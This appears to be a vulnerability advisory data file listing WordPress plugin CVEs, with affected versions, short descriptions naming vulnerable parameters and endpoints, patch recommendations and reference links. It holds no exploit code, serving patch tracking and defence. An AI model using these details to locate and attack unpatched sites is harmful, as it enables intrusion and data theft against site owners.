{"CVE_ID":"CVE-2024-6651","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"The WordPress File Upload WordPress plugin before 4.24.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6494","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"The WordPress File Upload WordPress plugin before 4.24.8 does not properly sanitize and escape certain parameters, which could allow unauthenticated users to execute stored cross-site scripting (XSS) attacks.","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b21a9be-b5fe-47ef-91c7-018dd42f763f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b21a9be-b5fe-47ef-91c7-018dd42f763f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5852","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"The WordPress File Upload plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.24.7 via the 'uploadpath' parameter of the wordpress_file_upload shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload limited files to arbitrary locations on the web server.","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39bb69e0-fb18-4737-9eb7-bda2b5bc16a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39bb69e0-fb18-4737-9eb7-bda2b5bc16a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118456%40wp-file-upload&new=3118456%40wp-file-upload&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118456%40wp-file-upload&new=3118456%40wp-file-upload&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0466","slug":"sensei-lms","versionImpact":"4.24.3","versionEndExcluding":"4.24.4","description":"The Sensei LMS  WordPress plugin before 4.24.4 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak sensei_email and sensei_message Information.","recommendation":"Update to version 4.24.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53ab86dc-1195-4ba0-8eda-6a0d7b45c45f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53ab86dc-1195-4ba0-8eda-6a0d7b45c45f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7786","slug":"sensei-lms","versionImpact":"4.24.1","versionEndExcluding":"4.24.2","description":"The Sensei LMS  WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.","recommendation":"Update to version 4.24.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f44e6f8f-3ef2-45c9-ae9c-9403305a548a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f44e6f8f-3ef2-45c9-ae9c-9403305a548a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9608","slug":"woocommerce-myparcel","versionImpact":"4.24.1","versionEndExcluding":"4.24.2","description":"The MyParcel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.24.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the WooCommerce store is set to Belgium.","recommendation":"Update to version 4.24.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206928\\\/woocommerce-myparcel\\\/tags\\\/4.24.2\\\/includes\\\/admin\\\/settings\\\/class-wcmypa-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206928\\\/woocommerce-myparcel\\\/tags\\\/4.24.2\\\/includes\\\/admin\\\/settings\\\/class-wcmypa-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9939","slug":"wp-file-upload","versionImpact":"4.24.13","versionEndExcluding":"4.24.14","description":"The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.13 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read files outside of the originally intended directory.","recommendation":"Update to version 4.24.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188857\\\/wp-file-upload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188857\\\/wp-file-upload\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e51f301-026d-4ed7-82f8-96c1623bf95c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e51f301-026d-4ed7-82f8-96c1623bf95c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11635","slug":"wp-file-upload","versionImpact":"4.24.12","versionEndExcluding":"4.24.14","description":"The WordPress File Upload plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.24.12 via the 'wfu_ABSPATH' cookie parameter. This makes it possible for unauthenticated attackers to execute code on the server.","recommendation":"Update to version 4.24.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5165f60-6515-4a2c-a124-cc88155eaf01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5165f60-6515-4a2c-a124-cc88155eaf01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9047","slug":"wp-file-upload","versionImpact":"4.24.11","versionEndExcluding":"4.24.12","description":"The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.","recommendation":"Update to version 4.24.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/554a314c-9e8e-4691-9792-d086790ef40f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/554a314c-9e8e-4691-9792-d086790ef40f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164449\\\/wp-file-upload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164449\\\/wp-file-upload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4860","slug":"wp-rss-aggregator","versionImpact":"4.23.8","versionEndExcluding":"4.23.9","description":"The 'WordPress RSS Aggregator' WordPress Plugin, versions < 4.23.9 are affected by a Cross-Site Scripting (XSS) vulnerability due to the lack of sanitization of the\u00a0\u00a0'notice_id' \u00a0GET parameter.","recommendation":"Update to version 4.23.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-16\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0628","slug":"wp-rss-aggregator","versionImpact":"4.23.5","versionEndExcluding":"4.23.6","description":"The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 4.23.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2154383e-eabb-4964-8991-423dd68d5efb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2154383e-eabb-4964-8991-423dd68d5efb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029525\\\/wp-rss-aggregator\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029525\\\/wp-rss-aggregator\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0630","slug":"wp-rss-aggregator","versionImpact":"4.23.4","versionEndExcluding":"4.23.5","description":"The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.23.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026269\\\/wp-rss-aggregator\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026269\\\/wp-rss-aggregator\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4811","slug":"wp-file-upload","versionEndExcluding":"4.23.3","description":"The WordPress File Upload WordPress plugin before 4.23.3 does not sanitise and escape some of its settings, which could allow high privilege users such as contributors to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 4.23.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f9271f2-4de4-4be3-8746-2a3f149eb1d1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f9271f2-4de4-4be3-8746-2a3f149eb1d1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9583","slug":"wp-rss-aggregator","versionImpact":"4.23.12","versionEndExcluding":"4.23.13","description":"The RSS Aggregator \u2013 RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the wprss_ajax_send_premium_support function in all versions up to, and including, 4.23.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send premium support requests with an attacker-controlled subject line and email address to support allowing them to impersonate the site owner. License information may also be leaked.","recommendation":"Update to version 4.23.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/126c77fa-11c5-431f-8fc9-0375ed6c8a91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/126c77fa-11c5-431f-8fc9-0375ed6c8a91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168468\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168468\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6621","slug":"wp-rss-aggregator","versionImpact":"4.23.11","versionEndExcluding":"4.23.12","description":"The RSS Aggregator \u2013 RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wprss_activate_feed_source' and 'wprss_pause_feed_source' functions in all versions up to, and including, 4.23.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or pause existing RSS feeds.","recommendation":"Update to version 4.23.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e37331b-0b75-41ee-b390-532efd674cc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e37331b-0b75-41ee-b390-532efd674cc1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php?rev=3118231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php?rev=3118231\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9021","slug":"relevanssi","versionImpact":"4.23.0","versionEndExcluding":"4.23.1","description":"In the process of testing the Relevanssi  WordPress plugin before 4.23.1, a vulnerability was found that allows you to implement Stored XSS on behalf of the Contributor+ by embedding malicious script, which entails account takeover backdoor","recommendation":"Update to version 4.23.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f25646d-b80b-40b1-bcaf-3b860ddc4059\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f25646d-b80b-40b1-bcaf-3b860ddc4059\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7630","slug":"relevanssi","versionImpact":"4.22.2","versionEndExcluding":"4.23.0","description":"The Relevanssi \u2013 A Better Search plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.22.2 via the relevanssi_do_query() due to insufficient limitations on the posts that are returned when searching. This makes it possible for unauthenticated attackers to extract potentially sensitive information from password protected posts.","recommendation":"Update to version 4.23.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fa78f4e-ede2-4863-a2d7-99bd8c7b5912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fa78f4e-ede2-4863-a2d7-99bd8c7b5912?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134753\\\/relevanssi\\\/trunk\\\/lib\\\/common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134753\\\/relevanssi\\\/trunk\\\/lib\\\/common.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1380","slug":"relevanssi","versionImpact":"4.22.0","versionEndExcluding":"4.22.1","description":"The Relevanssi \u2013 A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is.","recommendation":"Update to version 4.22.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5884","slug":"word-balloon","versionImpact":"4.20.2","versionEndExcluding":"4.20.3","description":"The Word Balloon WordPress plugin before 4.20.3 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to trick a logged in user to delete arbitrary avatars by clicking a link.","recommendation":"Update to version 4.20.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4a7937c-6f4b-49dd-b88a-67ebe718ad19\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4a7937c-6f4b-49dd-b88a-67ebe718ad19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8009","slug":"sensei-lms","versionImpact":"4.19.2","versionEndExcluding":"4.20.0","description":"The Sensei LMS  WordPress plugin before 4.20.0 disclose all users of the blog including their email address to teachers on the students page","recommendation":"Update to version 4.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/737bb010-b2fa-4bf4-b124-5fbba67cf935\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/737bb010-b2fa-4bf4-b124-5fbba67cf935\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4105","slug":"splitit-installment-payments","versionImpact":"4.2.8","versionEndExcluding":"4.2.9","description":"The Splitit plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on several functions in the 'splitIt-flexfields-payment-gateway.php' file in all versions up to, and including, 4.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change plugin settings, including changing the environment from sandbox to production and vice versa.","recommendation":"Update to version 4.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L1927\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L1927\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6471b075-8115-4d38-a7dd-2308dca69f15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6471b075-8115-4d38-a7dd-2308dca69f15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4061","slug":"survey-maker","versionImpact":"4.2.8","versionEndExcluding":"4.2.9","description":"The Survey Maker  WordPress plugin before 4.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175a9f3a-1f8d-44d1-8a12-e037251b025d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175a9f3a-1f8d-44d1-8a12-e037251b025d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9205","slug":"maximum-products-per-user-for-woocommerce","versionImpact":"4.2.8","versionEndExcluding":"4.2.9","description":"The Maximum Products per User for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.2.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140c0d22-dc26-4100-a5c0-a2f8a6f98d97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140c0d22-dc26-4100-a5c0-a2f8a6f98d97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.8\\\/includes\\\/class-alg-wc-mppu-users.php#L836\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.8\\\/includes\\\/class-alg-wc-mppu-users.php#L836\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164534\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.9\\\/includes\\\/class-alg-wc-mppu-users.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164534\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.9\\\/includes\\\/class-alg-wc-mppu-users.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13128","slug":"learnpress","versionImpact":"4.2.7.5","versionEndExcluding":"4.2.7.5.1","description":"The LearnPress  WordPress plugin before 4.2.7.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1506a339-f85a-408a-8efa-ca83eb3b3ffb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1506a339-f85a-408a-8efa-ca83eb3b3ffb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13127","slug":"learnpress","versionImpact":"4.2.7.5","versionEndExcluding":"4.2.7.5.1","description":"The LearnPress  WordPress plugin before 4.2.7.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/003ac248-74db-4b83-af0b-aa37ffb9b3d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/003ac248-74db-4b83-af0b-aa37ffb9b3d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11868","slug":"learnpress","versionImpact":"4.2.7.3","versionEndExcluding":"4.2.7.4","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.7.3 via class-lp-rest-material-controller.php. This makes it possible for unauthenticated attackers to extract potentially sensitive paid course material.","recommendation":"Update to version 4.2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200780\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200780\\\/learnpress\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd43980-9193-4a63-adba-720dd1b11699?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd43980-9193-4a63-adba-720dd1b11699?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9881","slug":"learnpress","versionImpact":"4.2.7.1","versionEndExcluding":"4.2.7.2","description":"The LearnPress  WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10010","slug":"learnpress","versionImpact":"4.2.7.1","versionEndExcluding":"4.2.7.2","description":"The LearnPress  WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a258d33-a354-4cbb-bfcb-31b7f1b1a036\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a258d33-a354-4cbb-bfcb-31b7f1b1a036\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8529","slug":"learnpress","versionImpact":"4.2.7","versionEndExcluding":"4.2.7.1","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the \/wp-json\/lp\/v1\/courses\/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.7.1, or a newer patched 